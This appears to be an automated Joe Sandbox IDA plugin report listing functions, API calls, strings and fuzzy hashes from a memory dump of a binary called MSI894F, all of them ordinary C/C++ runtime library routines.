Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 89e0a9d79b26396fd2bc5bfe0aa88b5841c948d5cc689059e19409b3cbf557bc
Instruction ID: 788437e58c3cf27113fd5757dbc3287ba6ec7c74d21f4d37f865c2d3423cb478
Opcode Fuzzy Hash: 89e0a9d79b26396fd2bc5bfe0aa88b5841c948d5cc689059e19409b3cbf557bc
Instruction Fuzzy Hash: F0E09231A96324BBC7012B50FC08E9D3F15EF46729B014011F505E23E0CBF048008BF8

Function 00D7709D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00D7712D

Strings

pow, xrefs: 00D77105, 00D77122

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 6166c8224e1c371225007a6cec564f6e12f02e8c2fa22a6d2780b4fd8931dfdd
Instruction ID: ad1599731429229018e5e85bf66090c1e10fb85b36388e186ab7732627c38925
Opcode Fuzzy Hash: 6166c8224e1c371225007a6cec564f6e12f02e8c2fa22a6d2780b4fd8931dfdd
Instruction Fuzzy Hash: 9C517C61A0C302A6CB217714D94137E6BA4EB40700F68CD79F4DD822A9FB34CC959F76

Function 00D66C34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00D66D98

Strings

-, xrefs: 00D66DC9
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00D66CFE, 00D66D35, 00D66D3A

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: c3f75d7798f9fff356b2629ccc21204b70cfe97bab648059286044d1de2236c4
Instruction ID: 7011d03d70f16a8e34d5f38d2ea78979f26afcba2096778e19abcfa02d550eca
Opcode Fuzzy Hash: c3f75d7798f9fff356b2629ccc21204b70cfe97bab648059286044d1de2236c4
Instruction Fuzzy Hash: 8B51DF70B04698ABDF259E6D88917BEBFFAEF45310F19406AE8D1D7241C274DD428BB0

Function 00D4F860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00D4FA3E

Strings

true, xrefs: 00D4F97B
false, xrefs: 00D4F965

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: 79c33f98a25c320241784134aab05f4a4a3089b42722eafa18d738a8a5578011
Instruction ID: 1930b2e320feeeb129c4eb40cd8b7b66693d77ae5938ab52193d90fd9c456d12
Opcode Fuzzy Hash: 79c33f98a25c320241784134aab05f4a4a3089b42722eafa18d738a8a5578011
Instruction Fuzzy Hash: E551C8B1D003489FDB10DFA4C941BEEBBB8FF05314F14826AE845AB241E774A949CB71

Function 00D622AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D622B1
_swprintf.LIBCMT ref: 00D62329

Part of subcall function 00D5780A: __EH_prolog3.LIBCMT ref: 00D57811
Part of subcall function 00D5780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D5781B
Part of subcall function 00D5780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D5788C

Strings

%.0Lf, xrefs: 00D62321

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
String ID: %.0Lf
API String ID: 2348759532-1402515088
Opcode ID: 01672627d2916069f41f1f9507c1221a018c2107de6526b9fff4ba4410757081
Instruction ID: 0edfd5265326534c3ffa14fd4583d79ba58e047214661f1fb0f17480a588d56c
Opcode Fuzzy Hash: 01672627d2916069f41f1f9507c1221a018c2107de6526b9fff4ba4410757081
Instruction Fuzzy Hash: 37515D71D00219EBCF05EFE4D895AEDBBB5FF08300F204559E946AB295EB349905CF64

Function 00D6258E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D62595
_swprintf.LIBCMT ref: 00D6260D

Part of subcall function 00D4B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D4B52D
Part of subcall function 00D4B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D4B550
Part of subcall function 00D4B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B578
Part of subcall function 00D4B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B617

Strings

%.0Lf, xrefs: 00D62605

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: 313dbb58ed915c259800e81d7b32918ee9e3a6cbbd6f6131925066545d0a7f49
Instruction ID: 14ea9d48e8cfbeb8f8564d5e9df8eb741897f7e3bc84f1777faad9c01853058b
Opcode Fuzzy Hash: 313dbb58ed915c259800e81d7b32918ee9e3a6cbbd6f6131925066545d0a7f49
Instruction Fuzzy Hash: 95517C71D00219AFCF09EFE4D895AEDBBB9FF08300F204519E942AB295EB349905CF60

Function 00D66607 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D6660E
_swprintf.LIBCMT ref: 00D66686

Part of subcall function 00D4C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5BD
Part of subcall function 00D4C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5E0
Part of subcall function 00D4C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C608
Part of subcall function 00D4C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C6A7

Strings

%.0Lf, xrefs: 00D6667E

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: 33ce69de520ada1c1fdcf28ba0a14850b709e95da0a16da39a485dcfaa93b11a
Instruction ID: b34c9e9d5175431c040df5ac6215bd9a4bb42e06b710c8dc253e07acebe5d7d7
Opcode Fuzzy Hash: 33ce69de520ada1c1fdcf28ba0a14850b709e95da0a16da39a485dcfaa93b11a
Instruction Fuzzy Hash: C7515B71D10208EBCF09EFE4D885ADDBBB5FF08700F20455AE506AB2A5EB359955CF60

Function 00D49620 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

\\?\UNC\, xrefs: 00D496F7, 00D49752
\\?\, xrefs: 00D4976E, 00D4979B

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID:
String ID: \\?\$\\?\UNC\
API String ID: 0-3019864461
Opcode ID: 092a67fdacc071114f45d87ea23c441306ae2e03f10ec53d9e14c2e8c1aa2801
Instruction ID: 8418d68e67eecafe2605ff52a80f5c45873aca8fb505c80400aabc6068ac7977
Opcode Fuzzy Hash: 092a67fdacc071114f45d87ea23c441306ae2e03f10ec53d9e14c2e8c1aa2801
Instruction Fuzzy Hash: A351B0709102049BDB14CF69C995BAEFBF5FF99314F14451EE802B7280DBB5A988CBB4

Function 00D6B5D1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00D6B5F6

Strings

MOC, xrefs: 00D6B608
RCC, xrefs: 00D6B610

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 60118bbebdd96fd5b11862eca8a2605fa162a8bdc992b76787f0a4aeeb733b9a
Instruction ID: 9dd1508b7681497c7cc4a38abee810f7240551171f411af540529a4005cb2eec
Opcode Fuzzy Hash: 60118bbebdd96fd5b11862eca8a2605fa162a8bdc992b76787f0a4aeeb733b9a
Instruction Fuzzy Hash: 55418A71900209AFCF15DF98CD81AEEBBB6FF48314F18815AF905AB262D7359990DF60

Function 00D6217C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D62183

Part of subcall function 00D5780A: __EH_prolog3.LIBCMT ref: 00D57811
Part of subcall function 00D5780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D5781B
Part of subcall function 00D5780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D5788C

Strings

0123456789-, xrefs: 00D621D3
%.0Lf, xrefs: 00D621CE

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: %.0Lf$0123456789-
API String ID: 2728201062-3094241602
Opcode ID: 5e6a176238476d0f6133fc91f90979e93b6bc803f6c913a27e85d6958eaba7b1
Instruction ID: fbf300218084d89443da4f80b6aa8e1056ce052fb1709f2f761bbf6508599079
Opcode Fuzzy Hash: 5e6a176238476d0f6133fc91f90979e93b6bc803f6c913a27e85d6958eaba7b1
Instruction Fuzzy Hash: 25416A31900618DFCF05EFD8D8959EDBBB5FF09310F140169E811AB251DB309A5ACB79

Function 00D664DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D664E2

Part of subcall function 00D4C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5BD
Part of subcall function 00D4C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5E0
Part of subcall function 00D4C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C608
Part of subcall function 00D4C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C6A7

Strings

0123456789-, xrefs: 00D66532
0123456789-, xrefs: 00D6652D

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 2088892359-2494171821
Opcode ID: 5ef7dbe3ef001ac1c43d73b3a2db0139106b4f512adcc3087251fc2eaf16024f
Instruction ID: 7c2b71d532867c0385c081938b08319b7e3489b601f8bcc0b7675285bf9ece97
Opcode Fuzzy Hash: 5ef7dbe3ef001ac1c43d73b3a2db0139106b4f512adcc3087251fc2eaf16024f
Instruction Fuzzy Hash: E6416C31900219EFCF09EFA8D8919EEBBB5EF08310F10005AF512A7265DB35EA55CB75

Function 00D62460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D62467

Part of subcall function 00D4B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D4B52D
Part of subcall function 00D4B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D4B550
Part of subcall function 00D4B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B578
Part of subcall function 00D4B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B617

Strings

0123456789-, xrefs: 00D624B2
0123456789-, xrefs: 00D624B7

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 2088892359-2494171821
Opcode ID: 80439ceb01e9323f6cacf30ae2c7cc55a244c0a8815a8db2c064bc84212849c8
Instruction ID: e61e58fb94e1a748cc1aeb7e67acf7c8b1c8cb34de6120eac44648ff057435f6
Opcode Fuzzy Hash: 80439ceb01e9323f6cacf30ae2c7cc55a244c0a8815a8db2c064bc84212849c8
Instruction Fuzzy Hash: 02414831900618DFCF15EFA8D8919EDBBB5FF08310F14016AF906AB251DB30AA5ACB75

Function 00D667B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D667BC
__cftoe.LIBCMT ref: 00D6684D

Strings

!%x, xrefs: 00D667D6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: fb53b52c2967149ba68791c31bf095c2fbb53a5b6bb70ddabbb55ee3b7e846a5
Instruction ID: 651f1eea492eaa0376ab7eb284af770fce72b44c9e899fe4ce13b0e1b90923ba
Opcode Fuzzy Hash: fb53b52c2967149ba68791c31bf095c2fbb53a5b6bb70ddabbb55ee3b7e846a5
Instruction Fuzzy Hash: 4041F374A11249EFDF05DFA8D881AEEBBB1BF18300F144429F955A7352D7309A05CBB1

Function 00D62DB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D62DBC
__cftoe.LIBCMT ref: 00D62E4F

Strings

!%x, xrefs: 00D62DCA

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 3fdc4af39490d4df0dbdd85e13473a10b9772c251abc2a02ce5b98d436ebffbb
Instruction ID: f67910ab228cfb03caf2dba39400ddb69e09f14c2f267f69b25773eb75fdaa1a
Opcode Fuzzy Hash: 3fdc4af39490d4df0dbdd85e13473a10b9772c251abc2a02ce5b98d436ebffbb
Instruction Fuzzy Hash: 09313A71A11609EBDF04DFA8D981AEEB7B2FF48304F204429F945AB212E7359E15CB74

Function 00D4D5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D4D682

Strings

+, xrefs: 00D4D5F6
%, xrefs: 00D4D609

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: _swprintf
String ID: %$+
API String ID: 589789837-2626897407
Opcode ID: 5ca130c36bdd79802d907c785530a81a64415f417fb180c405b44ab1bd266328
Instruction ID: 263f7717996143fbb5c551ad61390ef750ea6bfebcbe044ed3d521ba5d6b5e87
Opcode Fuzzy Hash: 5ca130c36bdd79802d907c785530a81a64415f417fb180c405b44ab1bd266328
Instruction Fuzzy Hash: 4621F3712083489FD711CF18D859B9BBBEAEF89304F09851DFA9887292D634D918C7B3

Function 00D4D6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D4D769

Strings

%, xrefs: 00D4D6F9
+, xrefs: 00D4D6E6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: _swprintf
String ID: %$+
API String ID: 589789837-2626897407
Opcode ID: 9e12d6bd9d135eafd7b6d34bb51295458b7d30bc28bc35c7c6b322afe9ff9afc
Instruction ID: 3bc7626678809c6cd43756a1853c5793865eb2110706124eef7a2ff9d2860b27
Opcode Fuzzy Hash: 9e12d6bd9d135eafd7b6d34bb51295458b7d30bc28bc35c7c6b322afe9ff9afc
Instruction Fuzzy Hash: 2F21D6752083459FD711CF14C855B9BBBEAEB85300F14881DFA9587292C734D919C7B7

Function 00D4D7B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D4D859

Strings

%, xrefs: 00D4D7E9
+, xrefs: 00D4D7D6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: _swprintf
String ID: %$+
API String ID: 589789837-2626897407
Opcode ID: 0dbb14ac61c91536d7990f1cbbe256c9ee453c51b4bf0bbc1359e056bc1be55e
Instruction ID: 8ea67ee76151f97059f5ce6b3d8f6aa73fdfcc1351c9ff9f9db39ca59c787f67
Opcode Fuzzy Hash: 0dbb14ac61c91536d7990f1cbbe256c9ee453c51b4bf0bbc1359e056bc1be55e
Instruction Fuzzy Hash: 4921C4712083459FE711CF14D845BABBBEAEB89300F04881DFA9497292D734D918C7B7

Function 00D480D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00D48116
LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,7EBC463A), ref: 00D48185

Strings

Invalid SID, xrefs: 00D48163

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ConvertFreeLocalString
String ID: Invalid SID
API String ID: 3201929900-130637731
Opcode ID: 488d8eaf457196341f8ff6ce4689a73de9d067218f372df4b32fca7fd6b90a42
Instruction ID: 4e2880fa3cbf2c14155a3868576ceddf74e88cd77e85b4c441a832ccd926e57b
Opcode Fuzzy Hash: 488d8eaf457196341f8ff6ce4689a73de9d067218f372df4b32fca7fd6b90a42
Instruction Fuzzy Hash: 16218E74A007059BDB10DF58C819BAFFBB9FF44B04F14461EE901A7380DBB56A458BE0

Function 00D4C140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00D4C16B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4C1CE

Strings

bad locale name, xrefs: 00D4C1F1

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: eb4867526552c0301b82cae7480769dcd4b8d49f296dfba4d6539be0dc501e78
Instruction ID: 53a921cfbc780b850cb7afa85d4e5909d830a885647ea7e7fc51f1d546ced88c
Opcode Fuzzy Hash: eb4867526552c0301b82cae7480769dcd4b8d49f296dfba4d6539be0dc501e78
Instruction Fuzzy Hash: C321D270805B84DED721CF68C90474BBFF4EF15714F14869EE89597B81D3B5AA08CBA1

Function 00D54077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D5407E

Strings

true, xrefs: 00D540E8
false, xrefs: 00D540D5

Memory Dump Source

